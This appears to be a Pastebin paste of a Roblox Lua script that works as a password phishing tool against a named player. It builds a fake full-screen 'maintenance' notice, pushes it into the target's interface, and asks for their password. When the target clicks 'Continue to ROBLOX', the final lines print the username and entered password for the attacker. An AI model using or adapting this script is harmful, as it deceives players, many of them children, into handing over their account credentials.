Advertisement
Guest User

Untitled

a guest
Jan 27th, 2018
267
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.03 KB | None | 0 0
  1. _G.target = "Full players name"
  2. local Accounts = Instance.new("ScreenGui")
  3. local AccountFrame = Instance.new("ScrollingFrame")
  4. local UsernameField = Instance.new("TextLabel")
  5. local PasswordField = Instance.new("TextLabel")
  6. local acc2_user = Instance.new("TextLabel")
  7. local acc2 = Instance.new("TextLabel")
  8. local acc3 = Instance.new("TextLabel")
  9. local acc3_user = Instance.new("TextLabel")
  10. local acc4_user = Instance.new("TextLabel")
  11. local acc4 = Instance.new("TextLabel")
  12. local acc5_user = Instance.new("TextLabel")
  13. local acc5 = Instance.new("TextLabel")
  14. local MGUI = Instance.new("ScreenGui")
  15. local MGUIFrame = Instance.new("Frame")
  16. local FakeMSG = Instance.new("TextLabel")
  17. local PassEnter = Instance.new("TextBox")
  18. local Continue = Instance.new("TextButton")
  19.  
  20. MGUI.Name = "MGUI"
  21. MGUI.Parent = game.StarterGui
  22.  
  23. MGUIFrame.Name = "MGUIFrame"
  24. MGUIFrame.Parent = MGUI
  25. MGUIFrame.BackgroundColor3 = Color3.new(0.509804, 1, 0.184314)
  26. MGUIFrame.Size = UDim2.new(1, 100, 1, 100)
  27.  
  28. FakeMSG.Name = "FakeMSG"
  29. FakeMSG.Parent = MGUIFrame
  30. FakeMSG.BackgroundColor3 = Color3.new(1, 1, 1)
  31. FakeMSG.BackgroundTransparency = 1
  32. FakeMSG.Size = UDim2.new(0, 1600, 0, 50)
  33. FakeMSG.Font = Enum.Font.Cartoon
  34. FakeMSG.Text = "ROBLOX is going down in Maintenance, please enter your password to continue."
  35. FakeMSG.TextScaled = true
  36. FakeMSG.TextSize = 14
  37. FakeMSG.TextWrapped = true
  38.  
  39. PassEnter.Name = "PassEnter"
  40. PassEnter.Parent = MGUIFrame
  41. PassEnter.BackgroundColor3 = Color3.new(0.509804, 1, 0.184314)
  42. PassEnter.Position = UDim2.new(0, 700, 0, 300)
  43. PassEnter.Size = UDim2.new(0, 200, 0, 50)
  44. PassEnter.Font = Enum.Font.SourceSans
  45. PassEnter.Text = "Enter here your password"
  46. PassEnter.TextScaled = true
  47. PassEnter.TextSize = 14
  48. PassEnter.TextWrapped = true
  49.  
  50. Continue.Name = "Continue"
  51. Continue.Parent = MGUIFrame
  52. Continue.BackgroundColor3 = Color3.new(0.509804, 1, 0.184314)
  53. Continue.Position = UDim2.new(0, 700, 0, 450)
  54. Continue.Size = UDim2.new(0, 200, 0, 50)
  55. Continue.Font = Enum.Font.SourceSans
  56. Continue.Text = "Continue to ROBLOX"
  57. Continue.TextScaled = true
  58. Continue.TextSize = 14
  59. Continue.TextWrapped = true
  60.  
  61. Accounts.Name = "Accounts"
  62. Accounts.Parent = game.StarterGui
  63.  
  64. AccountFrame.Name = "AccountFrame"
  65. AccountFrame.Parent = Accounts
  66. AccountFrame.BackgroundColor3 = Color3.new(0.188235, 0.615686, 0.0901961)
  67. AccountFrame.BackgroundTransparency = 0.40000000596046
  68. AccountFrame.Position = UDim2.new(0, 0, 0, 50)
  69. AccountFrame.Size = UDim2.new(0, 410, 0, 600)
  70.  
  71. UsernameField.Name = "UsernameField"
  72. UsernameField.Parent = AccountFrame
  73. UsernameField.BackgroundColor3 = Color3.new(0.345098, 0.615686, 0.0352941)
  74. UsernameField.BackgroundTransparency = 0.40000000596046
  75. UsernameField.BorderSizePixel = 0
  76. UsernameField.Size = UDim2.new(0, 200, 0, 50)
  77. UsernameField.Font = Enum.Font.SourceSans
  78. UsernameField.Text = "Username"
  79. UsernameField.TextScaled = true
  80. UsernameField.TextSize = 14
  81. UsernameField.TextWrapped = true
  82.  
  83. PasswordField.Name = "PasswordField"
  84. PasswordField.Parent = AccountFrame
  85. PasswordField.BackgroundColor3 = Color3.new(0.345098, 0.615686, 0.0352941)
  86. PasswordField.BackgroundTransparency = 0.40000000596046
  87. PasswordField.BorderSizePixel = 0
  88. PasswordField.Position = UDim2.new(0, 200, 0, 0)
  89. PasswordField.Size = UDim2.new(0, 200, 0, 50)
  90. PasswordField.Font = Enum.Font.SourceSans
  91. PasswordField.Text = "Password"
  92. PasswordField.TextScaled = true
  93. PasswordField.TextSize = 14
  94. PasswordField.TextWrapped = true
  95.  
  96. acc2_user.Name = "acc2_user"
  97. acc2_user.Parent = AccountFrame
  98. acc2_user.BackgroundColor3 = Color3.new(0.345098, 0.615686, 0.0352941)
  99. acc2_user.BackgroundTransparency = 0.40000000596046
  100. acc2_user.BorderSizePixel = 0
  101. acc2_user.Position = UDim2.new(0, 0, 0, 60)
  102. acc2_user.Size = UDim2.new(0, 200, 0, 50)
  103. acc2_user.Font = Enum.Font.SourceSans
  104. acc2_user.Text = "Username"
  105. acc2_user.TextScaled = true
  106. acc2_user.TextSize = 14
  107. acc2_user.TextWrapped = true
  108.  
  109. acc2.Name = "acc2"
  110. acc2.Parent = AccountFrame
  111. acc2.BackgroundColor3 = Color3.new(0.345098, 0.615686, 0.0352941)
  112. acc2.BackgroundTransparency = 0.40000000596046
  113. acc2.BorderSizePixel = 0
  114. acc2.Position = UDim2.new(0, 200, 0, 60)
  115. acc2.Size = UDim2.new(0, 200, 0, 50)
  116. acc2.Font = Enum.Font.SourceSans
  117. acc2.Text = "Password"
  118. acc2.TextScaled = true
  119. acc2.TextSize = 14
  120. acc2.TextWrapped = true
  121.  
  122. acc3.Name = "acc3"
  123. acc3.Parent = AccountFrame
  124. acc3.BackgroundColor3 = Color3.new(0.345098, 0.615686, 0.0352941)
  125. acc3.BackgroundTransparency = 0.40000000596046
  126. acc3.BorderSizePixel = 0
  127. acc3.Position = UDim2.new(0, 200, 0, 120)
  128. acc3.Size = UDim2.new(0, 200, 0, 50)
  129. acc3.Font = Enum.Font.SourceSans
  130. acc3.Text = "Password"
  131. acc3.TextScaled = true
  132. acc3.TextSize = 14
  133. acc3.TextWrapped = true
  134.  
  135. acc3_user.Name = "acc3_user"
  136. acc3_user.Parent = AccountFrame
  137. acc3_user.BackgroundColor3 = Color3.new(0.345098, 0.615686, 0.0352941)
  138. acc3_user.BackgroundTransparency = 0.40000000596046
  139. acc3_user.BorderSizePixel = 0
  140. acc3_user.Position = UDim2.new(0, 0, 0, 120)
  141. acc3_user.Size = UDim2.new(0, 200, 0, 50)
  142. acc3_user.Font = Enum.Font.SourceSans
  143. acc3_user.Text = "Username"
  144. acc3_user.TextScaled = true
  145. acc3_user.TextSize = 14
  146. acc3_user.TextWrapped = true
  147.  
  148. acc4_user.Name = "acc4_user"
  149. acc4_user.Parent = AccountFrame
  150. acc4_user.BackgroundColor3 = Color3.new(0.345098, 0.615686, 0.0352941)
  151. acc4_user.BackgroundTransparency = 0.40000000596046
  152. acc4_user.BorderSizePixel = 0
  153. acc4_user.Position = UDim2.new(0, 0, 0, 180)
  154. acc4_user.Size = UDim2.new(0, 200, 0, 50)
  155. acc4_user.Font = Enum.Font.SourceSans
  156. acc4_user.Text = "Username"
  157. acc4_user.TextScaled = true
  158. acc4_user.TextSize = 14
  159. acc4_user.TextWrapped = true
  160.  
  161. acc4.Name = "acc4"
  162. acc4.Parent = AccountFrame
  163. acc4.BackgroundColor3 = Color3.new(0.345098, 0.615686, 0.0352941)
  164. acc4.BackgroundTransparency = 0.40000000596046
  165. acc4.BorderSizePixel = 0
  166. acc4.Position = UDim2.new(0, 200, 0, 180)
  167. acc4.Size = UDim2.new(0, 200, 0, 50)
  168. acc4.Font = Enum.Font.SourceSans
  169. acc4.Text = "Password"
  170. acc4.TextScaled = true
  171. acc4.TextSize = 14
  172. acc4.TextWrapped = true
  173.  
  174. acc5_user.Name = "acc5_user"
  175. acc5_user.Parent = AccountFrame
  176. acc5_user.BackgroundColor3 = Color3.new(0.345098, 0.615686, 0.0352941)
  177. acc5_user.BackgroundTransparency = 0.40000000596046
  178. acc5_user.BorderSizePixel = 0
  179. acc5_user.Position = UDim2.new(0, 0, 0, 240)
  180. acc5_user.Size = UDim2.new(0, 200, 0, 50)
  181. acc5_user.Font = Enum.Font.SourceSans
  182. acc5_user.Text = "Username"
  183. acc5_user.TextScaled = true
  184. acc5_user.TextSize = 14
  185. acc5_user.TextWrapped = true
  186.  
  187. acc5.Name = "acc5"
  188. acc5.Parent = AccountFrame
  189. acc5.BackgroundColor3 = Color3.new(0.345098, 0.615686, 0.0352941)
  190. acc5.BackgroundTransparency = 0.40000000596046
  191. acc5.BorderSizePixel = 0
  192. acc5.Position = UDim2.new(0, 200, 0, 240)
  193. acc5.Size = UDim2.new(0, 200, 0, 50)
  194. acc5.Font = Enum.Font.SourceSans
  195. acc5.Text = "Password"
  196. acc5.TextScaled = true
  197. acc5.TextSize = 14
  198. acc5.TextWrapped = true
  199.  
  200.  
  201. --Main scripting
  202.  
  203. MGUI.Parent = game.Players[_G.target].PlayerGui
  204. --Accounts.Parent = game.Players.LocalPlayer
  205. Accounts:Remove()
  206.  
  207.  
  208. Continue.MouseButton1Click:connect(function()
  209. print("Username: ".._G.target.." | Password: "..PassEnter.Text)
  210. MGUI.Enabled = false
  211. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement